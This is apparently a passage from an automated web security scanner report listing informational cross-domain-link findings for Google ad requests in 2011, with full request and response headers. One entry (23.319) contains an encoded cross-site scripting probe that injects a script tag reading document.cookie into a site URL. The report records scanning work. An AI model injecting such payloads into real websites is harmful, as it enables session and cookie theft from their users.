23.315. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303683538&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F24%2Fdork%2Fxss-hidden-field-clientid-style-attribute.sealcontrolcasecom.htm&dt=1303665598385&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303665598446&frm=0&adk=1819763764&ga_vid=1399861298.1303665598&ga_sid=1303665598&ga_hid=587943372&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=964&bih=907&fu=0&ifi=1&dtd=97&xpc=OiuDeixu9X&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 17:19:55 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12553

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/24/dork/xss-hidden-field-clientid-style-attribute.sealcontrolcasecom.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.deloitte.com/us%26adT%3DBorder%2BSecurity%26adU%3Dwww.Sentrigo.com%26adT%3DDatabase%2BSecurity%2BGuide%26adU%3Dwww.appliedtrust.com%26adT%3DWeb-App%2BSecurity%2BJobs%26gl%3DUS&amp;usg=AFQjCNEvKE4GOkb0o0DrADT-E5_onpdKPw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.316. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680165&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662165285&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662165290&frm=1&adk=2614322350&ga_vid=188658383.1303662165&ga_sid=1303662165&ga_hid=445102242&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&eid=33895132&fu=4&ifi=1&dtd=7 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:22:42 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14486

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Amazon.com%26adT%3DArnazon.com%25C2%25AE%2B-%2BShop%26adU%3DPeru.travel%26adT%3DAmazonia%2BMuseums%26adU%3DMercedesCars.ConnectWithLife.com%26adT%3DMercedes-Benz%2BLiquidation%26adU%3Dwww.GoECart.com/Sell_More%26adT%3DEasier%2BAmazon%2BStore%2BMgmt.%26adU%3Dwww.mturk.com/solution_provider.com%26adT%3DCrowdControl%26gl%3DUS&amp;usg=AFQjCNFT9feGcLaoxV98LQ-NcOiqAXAoqg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.317. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681601&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663601428&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303663601439&frm=1&adk=2614322350&ga_vid=1398795791.1303663601&ga_sid=1303663601&ga_hid=418324679&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&eid=33895132&fu=4&ifi=1&dtd=14 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:46:38 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14690

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Dell.com/Blades%26adT%3DSecure%2BServer%26adU%3Dwww.areasys.com%26adT%3DServers%2Bwith%2BIntel%2BXeon%26adU%3Dtripplite.com/CoolingSolution%26adT%3DCooling%2BSolutions%26adU%3Dwww.Isilon.com%26adT%3DDataCenter%2BVirtualization%26adU%3DNetApp.com/us%26adT%3DData%2BStorage%2Bfor%2BWindows%25C2%25AE%26gl%3DUS&amp;usg=AFQjCNHUGHJTdEL8v9XHvzbVHt5PAGFkug" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.318. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679840&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661840622&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661840633&frm=1&adk=2614322350&ga_vid=158816197.1303661841&ga_sid=1303661841&ga_hid=472073499&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=14 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:17:17 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14491

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</a>&nbsp;<img alt="" class=cbg height=10 src="http://pagead2.googlesyndication.com/pagead/badge/checkout_999999.gif" title="This site accepts Google Checkout" width=19><div class=adb>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Amazon.com%26adT%3DArnazon.com%25C2%25AE%2B-%2BShop%26adU%3DPeru.travel%26adT%3DAmazonia%2BMuseums%26adU%3Dwww.webgility.com%26adT%3DAmazon%2B-sync-%2BQuickBooks%26adU%3DAmazonRiverCruises.com%26adT%3DAmazon%2BRiver%2BCruises%26adU%3DQuiBids.com/Auctions%26adT%3DKindle%25E2%2584%25A2%2BJust%2BSold,%2B%252442.13%26gl%3DUS&amp;usg=AFQjCNEVb0QlCWXTIUIJYozDjZLSy28jfQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.319. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-9314328132562548&output=html&h=90&slotname=1448208227&w=728&lmt=1303714796&flash=10.2.154&url=http%3A%2F%2Fwww.fightidentitytheft.com%2Ffilesb3ca1%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ea3ed31c598b%2Ffightid_favicon.ico&dt=1303697012551&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303697012740&frm=0&adk=3080309030&ga_vid=2066914421.1303674267&ga_sid=1303697013&ga_hid=639761271&ga_fc=1&ga_wpids=UA-192617-1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&dff=arial&dfs=13&biw=1034&bih=928&eid=33895299&ref=http%3A%2F%2Fburp%2Fshow%2F38&fu=0&ifi=1&dtd=340&xpc=VVbQ5JI0vc&p=http%3A//www.fightidentitytheft.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 02:03:23 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 20004

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script>(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime
...[SNIP]...
</script><script onload=tick('gjs','_gjs') src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.fightidentitytheft.com/filesb3ca1%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253Ea3ed31c598b/fightid_favicon.ico%26hl%3Den%26client%3Dca-pub-9314328132562548%26adU%3Dwww.FreeScoreOnline.com%26adT%3D3%2BBureau%2BCredit%2BReport%26adU%3DFreeScore.com/Free-Credit-Scores%26adT%3D3%2BCredit%2BScores%2B(Free)%26adU%3DFree3BureauCreditReport.com%26adT%3DGet%2BAll%2B3%2BCredit%2BReports%26gl%3DUS&amp;usg=AFQjCNF4C8YkGhQPerqCXZCrVVojxSNP8Q" target=_blank><script>
...[SNIP]...
</script><img alt="Ads by Google" border=0 height=16 onload=tick('abg','_abg') src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script onload=tick('smajs','_smajs') src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.320. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681514&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663514089&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303663514094&frm=1&adk=2614322350&ga_vid=1452939600.1303663514&ga_sid=1303663514&ga_hid=1887893451&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=8 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:45:11 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4385

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Dealfind.com/Chicago%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNEEtBZvptIU1j26lSvvQZoX6tkRdQ" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

23.321. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676458&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658458365&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658458370&frm=1&adk=2614322350&ga_vid=85731819.1303658458&ga_sid=1303658458&ga_hid=487541196&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=9 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:20:55 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14679

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keyword%25257D%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3DMercedesHouseNY.com%26adT%3DMercedes%2BHouse%26adU%3Dwww.Cadillac.com/CTS%26adT%3DE350%2Bvs%2BCadillac%2BCTS%26adU%3DMercedes.JustAnswer.com%26adT%3DAsk%2Ba%2BMercedes%2BMechanic%26adU%3Dwww.CarMax.com%26adT%3DUsed%2BMercedes%2BSL500%26adU%3Dwww.coolcapitals.com%26adT%3DValencia%2BRestuarants%26gl%3DUS&amp;usg=AFQjCNEiTeNssJSzIF3F8YQkYNVGPIFfpw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.322. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680632&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662632714&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662632726&frm=1&adk=2614322350&ga_vid=1105418859.1303662633&ga_sid=1303662633&ga_hid=1332985072&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=14 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:30:30 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14605

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Dell.com/Blades%26adT%3DSecure%2BServer%26adU%3Darenasportsgrille.com%26adT%3DARENA%2BSports%2BBar%2B%2526amp%253B%2BGrill%26adU%3Dwww.bing.com/Local%26adT%3DAtlanta%2BIrish%2BRestaurants%26adU%3Dwww.Appro.com%26adT%3DIntel%25C2%25AE%2BXeon%25C2%25AE%2BComputer%26adU%3Dwww.asaservers.com%26adT%3DASA%2B4U%2BServers%26gl%3DUS&amp;usg=AFQjCNGIfM4zWJNGwkTeDNHWeyyufhmeoQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.323. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676567&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658567227&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658567232&frm=1&adk=2614322350&ga_vid=528440502.1303658567&ga_sid=1303658567&ga_hid=1779278820&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=7 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:22:44 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14826

